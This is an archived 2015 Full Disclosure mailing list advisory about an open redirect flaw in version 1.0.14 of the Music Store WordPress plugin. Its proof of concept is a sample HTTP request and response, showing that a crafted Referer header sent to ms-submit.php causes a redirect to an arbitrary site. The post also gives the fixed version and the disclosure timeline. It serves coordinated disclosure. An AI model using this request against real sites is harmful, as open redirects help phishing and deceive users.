lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAARZ5vrBaf2YhU_YoTphhsFb6iKYPPiPUey7bS=zEB1Hxu9btg@mail.gmail.com> Date: Sat, 25 Jul 2015 01:51:57 +0000 From: Nitin Venkatesh <venkatesh.nitin@...il.com> To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org> Subject: [FD] Open Redirect Vulnerability in Music Store Wordpress Plugin v1.0.14 # Title: Open Redirect Vulnerability in Music Store Wordpress Plugin v1.0.14 # Submitter: Nitin Venkatesh # Product: Music Store Wordpress Plugin # Product URL: https://wordpress.org/plugins/music-store/ # Vulnerability Type: URL Redirection to Untrusted Site ('Open Redirect') [CWE-601] # Affected Versions: v1.0.14 and possibly below. # Tested versions: v1.0.14 # Fixed Version: v1.0.15 # Link to code diff: https://plugins.trac.wordpress.org/changeset/1178058/ # Changelog: https://wordpress.org/plugins/music-store/changelog/ # CVE Status: None & Fresh ## Product Information: Music Store is an online store for selling audio files: music, speeches, narratives, everything audio. In Music Store, secure payments with PayPal. ## Vulnerability Description: Adding HTTP referer to ms-core/ms-submit.php causes an Open redirect vulnerability ## Proof of Concept: Sample HTTP Request: GET /wp-content/plugins/music-store/ms-core/ms-submit.php HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://google.com/ Connection: keep-alive Sample HTTP Response: HTTP/1.1 302 Found Date: Fri, 05 Jun 2015 15:29:19 GMT location: https://google.com/ Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html ## Solution: Upgrade to v1.0.15 ## Disclosure Timeline: 2015-06-05 - Discovered. Contacted developer. 2015-06-10 - Updated v1.0.15 released 2015-07-25 - Publishing disclosure on FD mailing list ## Disclaimer: This disclosure is purely meant for educational purposes. I will in no way be responsible as to how the information in this disclosure is used. _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists